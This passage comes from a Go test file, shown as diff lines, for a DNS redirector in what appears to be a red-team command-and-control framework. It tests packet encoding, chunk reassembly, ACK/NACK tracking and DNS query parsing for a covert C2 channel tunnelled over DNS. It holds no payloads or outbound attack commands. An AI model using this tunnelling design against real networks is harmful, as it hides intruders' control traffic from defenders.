require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_INIT, decoded.Type) + assert.Equal(t, "test1234", decoded.ConversationId) + assert.Equal(t, []byte{0x01, 0x02, 0x03}, decoded.Data) + }) + + t.Run("valid DATA packet with CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: crc32.ChecksumIEEE(data), + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_DATA, decoded.Type) + assert.Equal(t, data, decoded.Data) + }) + + t.Run("DATA packet with invalid CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: 0xDEADBEEF, // Wrong CRC + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + _, err = r.decodePacket(encoded) + assert.Error(t, err) + assert.Contains(t, err.Error(), "CRC mismatch") + }) + + t.Run("invalid Base32", func(t *testing.T) { + _, err := r.decodePacket("!!!invalid!!!") + assert.Error(t, err) + }) + + t.Run("invalid protobuf", func(t *testing.T) { + // Valid Base32 but not valid protobuf + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString([]byte{0xFF, 0xFF, 0xFF}) + _, err := r.decodePacket(encoded) + assert.Error(t, err) + }) + + t.Run("packet with labels (dots)", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "test1234", + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + // Split into labels (simulating DNS format) + withDots := encoded[:4] + "." + encoded[4:] + + decoded, err := r.decodePacket(withDots) + require.NoError(t, err) + assert.Equal(t, "test1234", decoded.ConversationId) + }) +} + +// TestComputeAcksNacks tests the ACK range and NACK computation +func TestComputeAcksNacks(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + chunks map[uint32][]byte + expectedAcks []*dnspb.AckRange + expectedNacks []uint32 + }{ + { + name: "empty chunks", + chunks: map[uint32][]byte{}, + expectedAcks: []*dnspb.AckRange{}, + expectedNacks: []uint32{}, + }, + { + name: "single chunk", + chunks: map[uint32][]byte{ + 1: {0x01}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + }, + expectedNacks: []uint32{}, + }, + { + name: "consecutive chunks", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 3: {0x03}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 3}, + }, + expectedNacks: []uint32{}, + }, + { + name: "gap in middle", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 5: {0x05}, + 6: {0x06}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 2}, + {StartSeq: 5, EndSeq: 6}, + }, + expectedNacks: []uint32{3, 4}, + }, + { + name: "multiple gaps", + chunks: map[uint32][]byte{ + 1: {0x01}, + 3: {0x03}, + 5: {0x05}, + 10: {0x0A}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + {StartSeq: 3, EndSeq: 3}, + {StartSeq: 5, EndSeq: 5}, + {StartSeq: 10, EndSeq: 10}, + }, + expectedNacks: []uint32{2, 4, 6, 7, 8, 9}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + conv := &Conversation{ + Chunks: tt.chunks, + } + + acks, nacks := r.computeAcksNacks(conv) + + // Sort both slices for comparison + sort.Slice(acks, func(i, j int) bool { return acks[i].StartSeq < acks[j].StartSeq }) + + assert.Equal(t, tt.expectedAcks, acks) + assert.Equal(t, tt.expectedNacks, nacks) + }) + } +} + +// TestHandleInitPacket tests INIT packet processing +func TestHandleInitPacket(t *testing.T) { + t.Run("valid init packet", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0x12345678, + FileSize: 1024, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + responseData, err := r.handleInitPacket(packet) + require.NoError(t, err) + require.NotNil(t, responseData) + + // Verify response is a STATUS packet + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(responseData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "conv1234", statusPacket.ConversationId) + + // Verify conversation was created + val, ok := r.conversations.Load("conv1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, uint32(5), conv.TotalChunks) + assert.Equal(t, uint32(0x12345678), conv.ExpectedCRC) + assert.Equal(t, uint32(1024), conv.ExpectedDataSize) + }) + + t.Run("invalid init payload", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: []byte{0xFF, 0xFF}, // Invalid protobuf + } + + _, err := r.handleInitPacket(packet) + assert.Error(t, err) + }) + + t.Run("data size exceeds maximum", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + FileSize: MaxDataSize + 1, // Exceeds limit + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "exceeds maximum") + }) + + t.Run("max conversations reached", func(t *testing.T) { + r := &Redirector{ + conversationCount: MaxActiveConversations, + } + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "max active conversations") + }) +} + +// TestHandleFetchPacket tests FETCH packet processing +func TestHandleFetchPacket(t *testing.T) { + t.Run("fetch single response", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("test response data") + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, responseData, data) + }) + + t.Run("fetch chunked response metadata", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("full response") + responseCRC := crc32.ChecksumIEEE(responseData) + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + ResponseChunks: [][]byte{[]byte("chunk1"), []byte("chunk2")}, + ResponseCRC: responseCRC, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: nil, // No payload = request metadata + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + + var metadata dnspb.ResponseMetadata + err = proto.Unmarshal(data, &metadata) + require.NoError(t, err) + assert.Equal(t, uint32(2), metadata.TotalChunks) + assert.Equal(t, responseCRC, metadata.DataCrc32) + }) + + t.Run("fetch specific chunk", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0"), []byte("chunk1"), []byte("chunk2")}, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 2} // 1-indexed + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, []byte("chunk1"), data) // 1-indexed -> 0-indexed + }) + + t.Run("fetch unknown conversation", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "unknown", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("fetch with no response ready", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: nil, // No response yet + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "no response data") + }) + + t.Run("fetch chunk out of bounds", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0")}, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 10} // Out of bounds + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "invalid chunk index") + }) +} + +// TestParseDomainNameAndType tests DNS query parsing +func TestParseDomainNameAndType(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + query []byte + expectDomain string + expectType uint16 + expectError bool + }{ + { + name: "valid TXT query", + query: func() []byte { + q := []byte{ + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 16, // Type: TXT + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "dnsc2.realm.pub", + expectType: 16, + }, + { + name: "valid A query", + query: func() []byte { + q := []byte{ + 4, 't', 'e', 's', 't', // "test" + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 1, // Type: A + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "test.dnsc2.realm.pub", + expectType: 1, + }, + { + name: "valid AAAA query", + query: func() []byte { + q := []byte{ + 3, 'w', 'w', 'w', // "www" + 4, 't', 'e', 's', 't', // "test" + 3, 'c', 'o', 'm', // "com" + 0, // null terminator + 0, 28, // Type: AAAA + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "www.test.com", + expectType: 28, + }, + { + name: "truncated query", + query: []byte{7, 'e', 'x', 'a'}, // Incomplete + expectError: true, + }, + { + name: "query too short for type", + query: []byte{4, 't', 'e', 's', 't', 0}, // Missing type/class + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + domain, queryType, err := r.parseDomainNameAndType(tt.query) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectDomain, domain) + assert.Equal(t, tt.expectType, queryType) + }) + } +} + +// TestConversationCleanup tests cleanup of stale conversations +func TestConversationCleanup(t *testing.T) { + r := &Redirector{ + conversationTimeout: 15 * time.Minute, + } + + // Create stale conversation + staleConv := &Conversation{ + ID: "stale", + LastActivity: time.Now().Add(-20 * time.Minute), + } + r.conversations.Store("stale", staleConv) + r.conversationCount = 1 + + // Create fresh conversation + freshConv := &Conversation{ + ID: "fresh", + LastActivity: time.Now(), + } + r.conversations.Store("fresh", freshConv) + r.conversationCount = 2 + + // Run cleanup + now := time.Now() + r.conversations.Range(func(key, value any) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > r.conversationTimeout { + r.conversations.Delete(key) + r.conversationCount-- + } + conv.mu.Unlock() + return true + }) + + // Verify stale was removed + _, ok := r.conversations.Load("stale") + assert.False(t, ok, "stale conversation should be removed") + + // Verify fresh remains + _, ok = r.conversations.Load("fresh") + assert.True(t, ok, "fresh conversation should remain") + + assert.Equal(t, int32(1), r.conversationCount) +} + +// TestConcurrentConversationAccess tests thread safety of conversation handling +func TestConcurrentConversationAccess(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 100, + DataCrc32: 0, + FileSize: 0, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "concurrent", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + require.NoError(t, err) + + // Concurrent access to store chunks + var wg sync.WaitGroup + for i := uint32(1); i <= 100; i++ { + wg.Add(1) + go func(seq uint32) { + defer wg.Done() + + val, ok := r.conversations.Load("concurrent") + if !ok { + return + } + conv := val.(*Conversation) + conv.mu.Lock() + conv.Chunks[seq] = []byte{byte(seq)} + conv.mu.Unlock() + }(i) + } + wg.Wait() + + // Verify all chunks stored + val, ok := r.conversations.Load("concurrent") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 100) +} + +// TestBuildDNSResponse tests DNS response packet construction +func TestBuildDNSResponse(t *testing.T) { + r := &Redirector{} + + // Create a mock UDP connection for testing + serverAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + serverConn, err := net.ListenUDP("udp", serverAddr) + require.NoError(t, err) + defer serverConn.Close() + + clientAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + clientConn, err := net.ListenUDP("udp", clientAddr) + require.NoError(t, err) + defer clientConn.Close() + + t.Run("TXT record response", func(t *testing.T) { + r.sendDNSResponse(serverConn, clientConn.LocalAddr().(*net.UDPAddr), 0x1234, "test.dnsc2.realm.pub", txtRecordType, []byte("hello")) + + buf := make([]byte, 512) + clientConn.SetReadDeadline(time.Now().Add(time.Second)) + n, _, err := clientConn.ReadFromUDP(buf) + require.NoError(t, err) + + // Verify transaction ID + assert.Equal(t, uint16(0x1234), uint16(buf[0])<<8|uint16(buf[1])) + // Verify it's a response (QR bit set) + assert.True(t, buf[2]&0x80 != 0) + // Verify answer count is 1 + assert.Equal(t, uint16(1), uint16(buf[6])<<8|uint16(buf[7])) + + // Response should contain data + assert.Greater(t, n, 12) + }) +} + +// TestHandleDataPacket tests DATA packet processing and chunk storage +func TestHandleDataPacket(t *testing.T) { + t.Run("store single chunk", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation first with INIT - set TotalChunks > 1 to avoid completion + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 2, // Prevent completion on first chunk + DataCrc32: crc32.ChecksumIEEE([]byte{0x01, 0x02}), + FileSize: 2, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "data1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send DATA packet + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "data1234", + Sequence: 1, + Data: []byte{0x01}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Verify STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "data1234", statusPacket.ConversationId) + + // Verify chunk was stored + val, ok := r.conversations.Load("data1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 1) + assert.Equal(t, []byte{0x01}, conv.Chunks[1]) + }) + + t.Run("store multiple chunks with gaps", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0, + FileSize: 5, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "gaps1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunks 1, 3, 5 (gaps at 2, 4) + for _, seq := range []uint32{1, 3, 5} { + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "gaps1234", + Sequence: seq, + Data: []byte{byte(seq)}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Parse STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + + // Should always have ACKs for received chunks + assert.NotEmpty(t, statusPacket.Acks) + // NACKs will appear after gaps - not on first chunk + } + + // Verify chunks stored + val, ok := r.conversations.Load("gaps1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 3) + assert.Equal(t, []byte{1}, conv.Chunks[1]) + assert.Equal(t, []byte{3}, conv.Chunks[3]) + assert.Equal(t, []byte{5}, conv.Chunks[5]) + assert.False(t, conv.Completed) // Not all chunks received + }) + + t.Run("unknown conversation", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "unknown", + Sequence: 1, + Data: []byte{0x01}, + } + + _, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("sequence out of bounds", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 3, + DataCrc32: 0, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "bounds1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunk with sequence > TotalChunks + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "bounds1234", + Sequence: 10, + Data: []byte{0x01}, + } + + _, err = r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "sequence out of bounds") + }) +} + +// TestProcessCompletedConversation tests data reassembly and CRC validation +func TestProcessCompletedConversation(t *testing.T) { + t.Run("successful reassembly and CRC validation", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03, 0x04, 0x05} + expectedCRC := crc32.ChecksumIEEE(data) + + conv := &Conversation{ + ID: "complete1234", + MethodPath: "/test/method", + TotalChunks: 3, + ExpectedCRC: expectedCRC, + ExpectedDataSize: uint32(len(data)), + Chunks: map[uint32][]byte{ + 1: {0x01, 0x02}, + 2: {0x03, 0x04}, + 3: {0x05}, + }, + } + + // Mock upstream that returns empty response + // Since we can't easily mock grpc.ClientConn, we'll test the reassembly logic + // by directly checking the data assembly + + // Manually reassemble to test logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + require.True(t, ok, "missing chunk %d", i) + fullData = append(fullData, chunk...) + } + + assert.Equal(t, data, fullData) + actualCRC := crc32.ChecksumIEEE(fullData) + assert.Equal(t, expectedCRC, actualCRC) + assert.Equal(t, conv.ExpectedDataSize, uint32(len(fullData))) + }) + + t.Run("CRC mismatch detection", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03} + wrongCRC := uint32(0xDEADBEEF) + + conv := &Conversation{ + ID: "crcfail1234", + MethodPath: "/test/method", + TotalChunks: 1, + ExpectedCRC: wrongCRC, + Chunks: map[uint32][]byte{ + 1: data, + }, + } + + // Test CRC validation logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + fullData = append(fullData, conv.Chunks[i]...) + } + + actualCRC := crc32.ChecksumIEEE(fullData) + assert.NotEqual(t, wrongCRC, actualCRC, "CRC should mismatch") + }) +}